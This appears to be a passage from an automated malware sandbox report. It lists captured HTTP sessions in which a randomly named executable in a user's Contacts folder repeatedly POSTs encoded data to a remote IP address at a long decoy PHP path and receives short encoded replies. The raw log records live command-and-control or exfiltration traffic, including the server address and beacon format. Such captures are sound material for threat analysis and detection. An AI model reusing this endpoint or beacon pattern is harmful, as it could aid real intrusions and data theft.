                                                            6377.91.124.10180192.168.2.549777C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:08.237934113 CET414OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:08.439186096 CET414INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:08.439804077 CET417OUTData Raw: 52 5b 5d 5d 5b 59 5f 5b 5d 57 55 57 55 5b 57 54 50 58 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]][Y_[]WUWU[WTPXX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+.+9?07.4%4!+#.Q&=V'#%.]<,,.&G''^)3
                                                            Nov 21, 2023 04:48:08.642436981 CET417INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:08 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            64192.168.2.54977877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:08.956479073 CET418OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:09.155344963 CET418INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:09.155574083 CET421OUTData Raw: 52 5f 58 5e 5e 5a 5a 5d 5d 57 55 57 55 59 57 5b 50 5a 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^^ZZ]]WUWUYW[PZXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)[?T>#3\/._#)*+U5'>Q&3-.*+<;];>&G''^)
                                                            Nov 21, 2023 04:48:09.359371901 CET421INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6477.91.124.10180192.168.2.549778C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:08.956479073 CET418OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:09.155344963 CET418INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:09.155574083 CET421OUTData Raw: 52 5f 58 5e 5e 5a 5a 5d 5d 57 55 57 55 59 57 5b 50 5a 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^^ZZ]]WUWUYW[PZXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)[?T>#3\/._#)*+U5'>Q&3-.*+<;];>&G''^)
                                                            Nov 21, 2023 04:48:09.359371901 CET421INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            65192.168.2.54977977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:09.674050093 CET422OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:09.870726109 CET422INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:09.871032000 CET424OUTData Raw: 52 5a 5d 5b 5b 5e 5f 5a 5d 57 55 57 55 59 57 51 50 5d 58 41 56 5e 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ][[^_Z]WUWUYWQP]XAV^W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+81<.S*3\8:[7:)0"S'=!'-.(%>/ ,&G''^)
                                                            Nov 21, 2023 04:48:10.072663069 CET425INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6577.91.124.10180192.168.2.549779C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:09.674050093 CET422OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:09.870726109 CET422INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:09.871032000 CET424OUTData Raw: 52 5a 5d 5b 5b 5e 5f 5a 5d 57 55 57 55 59 57 51 50 5d 58 41 56 5e 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ][[^_Z]WUWUYWQP]XAV^W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+81<.S*3\8:[7:)0"S'=!'-.(%>/ ,&G''^)
                                                            Nov 21, 2023 04:48:10.072663069 CET425INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:09 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            66192.168.2.54978077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:10.395653963 CET426OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:10.593367100 CET426INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:10.593626022 CET428OUTData Raw: 57 5c 58 50 5e 5e 5f 5e 5d 57 55 57 55 56 57 55 50 5c 58 44 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP^^_^]WUWUVWUP\XDVUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y+(%^<"R=#\,:^ )Y?=3-.V33&R-;>/8;&G''^)
                                                            Nov 21, 2023 04:48:10.796176910 CET429INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:10 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6677.91.124.10180192.168.2.549780C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:10.395653963 CET426OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:10.593367100 CET426INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:10.593626022 CET428OUTData Raw: 57 5c 58 50 5e 5e 5f 5e 5d 57 55 57 55 56 57 55 50 5c 58 44 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\XP^^_^]WUWUVWUP\XDVUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y+(%^<"R=#\,:^ )Y?=3-.V33&R-;>/8;&G''^)
                                                            Nov 21, 2023 04:48:10.796176910 CET429INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:10 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            67192.168.2.54978177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.114900112 CET430OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.311685085 CET430INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.312056065 CET432OUTData Raw: 57 59 58 59 5b 59 5a 51 5d 57 55 57 55 59 57 50 50 5a 58 43 56 52 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXY[YZQ]WUWUYWPPZXCVRWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)5<(%)U4;-4:=<0=&-2S&0.:X>,/_/>&G''^)
                                                            Nov 21, 2023 04:48:11.513534069 CET433INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6777.91.124.10180192.168.2.549781C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.114900112 CET430OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.311685085 CET430INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.312056065 CET432OUTData Raw: 57 59 58 59 5b 59 5a 51 5d 57 55 57 55 59 57 50 50 5a 58 43 56 52 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXY[YZQ]WUWUYWPPZXCVRWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)5<(%)U4;-4:=<0=&-2S&0.:X>,/_/>&G''^)
                                                            Nov 21, 2023 04:48:11.513534069 CET433INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6877.91.124.10180192.168.2.549782C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.571331024 CET434OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1380
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.769016981 CET434INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.769237995 CET436OUTData Raw: 52 5c 5d 5c 5b 5e 5f 5a 5d 57 55 57 55 56 57 57 50 58 58 48 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]\[^_Z]WUWUVWWPXXHVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8>?+&=.') 5_+)$>:W'0-5<7\,&G''^)
                                                            Nov 21, 2023 04:48:11.971777916 CET439INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 12 25 59 23 01 34 0a 33 55 28 03 2e 0b 2c 2e 07 19 28 33 25 5a 27 3d 3f 01 24 07 25 50 3c 01 3f 05 27 29 06 1d 37 36 33 00 3d 30 21 5a 0c 1d 25 03 22 2b 23 1f 3f 00 2c 5c 2b 13 37 04 31 1f 3b 59 3f 10 23 54 23 33 06 04 25 0a 38 56 2e 3c 3d 10 2e 01 35 1a 32 02 00 59 34 07 23 5f 0c 14 27 17 35 31 27 5b 20 0e 3e 1c 23 37 30 15 23 24 2f 53 27 5b 30 13 32 28 21 5f 3f 2b 3c 54 27 27 3b 09 24 39 37 1e 26 39 28 08 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "%Y#43U(.,.(3%Z'=?$%P<?')763=0!Z%"+#?,\+71;Y?#T#3%8V.<=.52Y4#_'51'[ >#70#$/S'[02(!_?+<T'';$97&9()*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            68192.168.2.54978277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.571331024 CET434OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1380
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.769016981 CET434INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.769237995 CET436OUTData Raw: 52 5c 5d 5c 5b 5e 5f 5a 5d 57 55 57 55 56 57 57 50 58 58 48 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]\[^_Z]WUWUVWWPXXHVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8>?+&=.') 5_+)$>:W'0-5<7\,&G''^)
                                                            Nov 21, 2023 04:48:11.971777916 CET439INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 12 25 59 23 01 34 0a 33 55 28 03 2e 0b 2c 2e 07 19 28 33 25 5a 27 3d 3f 01 24 07 25 50 3c 01 3f 05 27 29 06 1d 37 36 33 00 3d 30 21 5a 0c 1d 25 03 22 2b 23 1f 3f 00 2c 5c 2b 13 37 04 31 1f 3b 59 3f 10 23 54 23 33 06 04 25 0a 38 56 2e 3c 3d 10 2e 01 35 1a 32 02 00 59 34 07 23 5f 0c 14 27 17 35 31 27 5b 20 0e 3e 1c 23 37 30 15 23 24 2f 53 27 5b 30 13 32 28 21 5f 3f 2b 3c 54 27 27 3b 09 24 39 37 1e 26 39 28 08 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "%Y#43U(.,.(3%Z'=?$%P<?')763=0!Z%"+#?,\+71;Y?#T#3%8V.<=.52Y4#_'51'[ >#70#$/S'[02(!_?+<T'';$97&9()*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            69192.168.2.54978377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.689568043 CET434OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.885853052 CET436INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.886046886 CET438OUTData Raw: 52 5a 58 51 5e 59 5a 5f 5d 57 55 57 55 5f 57 53 50 52 58 43 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXQ^YZ_]WUWU_WSPRXCVQWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)%_<:*#,72 >)3S'."R0295(?\,>&G''^)#
                                                            Nov 21, 2023 04:48:12.086941957 CET439INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6977.91.124.10180192.168.2.549783C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:11.689568043 CET434OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:11.885853052 CET436INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:11.886046886 CET438OUTData Raw: 52 5a 58 51 5e 59 5a 5f 5d 57 55 57 55 5f 57 53 50 52 58 43 56 51 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
